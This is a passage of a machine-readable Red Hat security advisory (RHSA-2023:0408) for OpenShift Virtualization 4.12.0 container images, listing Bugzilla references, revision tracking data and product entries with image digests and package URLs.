"https://bugzilla.redhat.com/show_bug.cgi?id=2129234", }, { category: "external", summary: "2129301", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129301", }, { category: "external", summary: "2129870", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129870", }, { category: "external", summary: "2130509", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130509", }, { category: "external", summary: "2130588", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130588", }, { category: "external", summary: "2130695", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130695", }, { category: "external", summary: "2130909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130909", }, { category: "external", summary: "2131157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131157", }, { category: "external", summary: "2131165", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131165", }, { category: "external", summary: "2131674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131674", }, { category: "external", summary: "2132031", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132031", }, { category: "external", summary: "2132682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132682", }, { category: "external", summary: "2132721", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132721", }, { category: "external", summary: "2132744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132744", }, { category: "external", summary: "2132746", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132746", }, { category: "external", summary: "2132783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132783", }, { category: "external", summary: "2132793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132793", }, { category: "external", summary: "2132932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132932", }, { category: "external", summary: "2133540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133540", }, { category: "external", summary: "2133541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133541", }, { category: "external", summary: "2133542", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133542", }, { category: "external", summary: "2133543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133543", }, { category: "external", summary: "2133655", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133655", }, { category: "external", summary: "2133656", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133656", }, { category: "external", summary: "2133659", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133659", }, { category: "external", summary: "2133660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133660", }, { category: "external", summary: "2134123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134123", }, { category: "external", summary: "2134672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134672", }, { category: "external", summary: "2134825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134825", }, { category: "external", summary: "2135805", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2135805", }, { category: "external", summary: "2136051", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136051", }, { category: "external", summary: "2136425", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136425", }, { category: "external", summary: "2136534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136534", }, { category: "external", summary: "2137123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137123", }, { category: "external", summary: "2137241", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137241", }, { category: "external", summary: "2137243", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137243", }, { category: "external", summary: "2137349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137349", }, { category: "external", summary: "2137591", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137591", }, { category: "external", summary: "2137731", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137731", }, { category: "external", summary: "2137733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137733", }, { category: "external", summary: "2137736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137736", }, { category: "external", summary: "2137896", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137896", }, { category: "external", summary: "2138112", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138112", }, { category: "external", summary: "2138119", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138119", }, { category: "external", summary: "2138199", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138199", }, { category: "external", summary: "2138653", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138653", }, { category: "external", summary: "2138657", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138657", }, { category: "external", summary: "2138664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138664", }, { category: "external", summary: "2139257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139257", }, { category: "external", summary: "2139260", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139260", }, { category: "external", summary: "2139293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139293", }, { category: "external", summary: "2139296", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139296", }, { category: "external", summary: "2139299", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139299", }, { category: "external", summary: "2139306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139306", }, { category: "external", summary: "2139479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139479", }, { category: "external", summary: "2139574", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139574", }, { category: "external", summary: "2139651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139651", }, { category: "external", summary: "2139687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139687", }, { category: "external", summary: "2139738", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139738", }, { category: "external", summary: "2139820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139820", }, { category: "external", summary: "2140117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140117", }, { category: "external", summary: "2140521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140521", }, { category: "external", summary: "2140534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140534", }, { category: "external", summary: "2140627", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140627", }, { category: "external", summary: "2140730", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140730", }, { category: "external", summary: "2140808", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140808", }, { category: "external", summary: "2140977", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140977", }, { category: "external", summary: "2140982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140982", }, { category: "external", summary: "2140998", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140998", }, { category: "external", summary: "2141089", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141089", }, { category: "external", summary: "2141302", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141302", }, { category: "external", summary: "2141399", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141399", }, { category: "external", summary: "2141494", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141494", }, { category: "external", summary: "2141654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141654", }, { category: "external", summary: "2141711", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141711", }, { category: "external", summary: "2142468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142468", }, { category: "external", summary: "2142470", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142470", }, { category: "external", summary: "2142511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142511", }, { category: "external", summary: "2142647", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142647", }, { category: "external", summary: "2142891", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142891", }, { category: "external", summary: "2142929", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142929", }, { category: "external", summary: "2143268", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143268", }, { category: "external", summary: "2143498", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143498", }, { category: "external", summary: "2143964", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143964", }, { category: "external", summary: "2144580", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144580", }, { category: "external", summary: "2144828", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144828", }, { category: "external", summary: "2144839", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144839", }, { category: "external", summary: "2153849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2153849", }, { category: "external", summary: "2155757", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2155757", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_0408.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update", tracking: { current_release_date: "2025-05-02T21:05:42+00:00", generator: { date: "2025-05-02T21:05:42+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.3", }, }, id: "RHSA-2023:0408", initial_release_date: "2023-01-25T11:11:29+00:00", revision_history: [ { date: "2023-01-25T11:11:29+00:00", number: "1", summary: "Initial version", }, { date: "2023-01-25T11:11:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-05-02T21:05:42+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.12 for RHEL 8", product: { name: "CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.12::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.12.0-58", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.12.0-769", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.12.0-31", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.12.0-182", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.12.0-64", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.12.0-40", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.12.0-32", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", product_identification_helper: { purl: 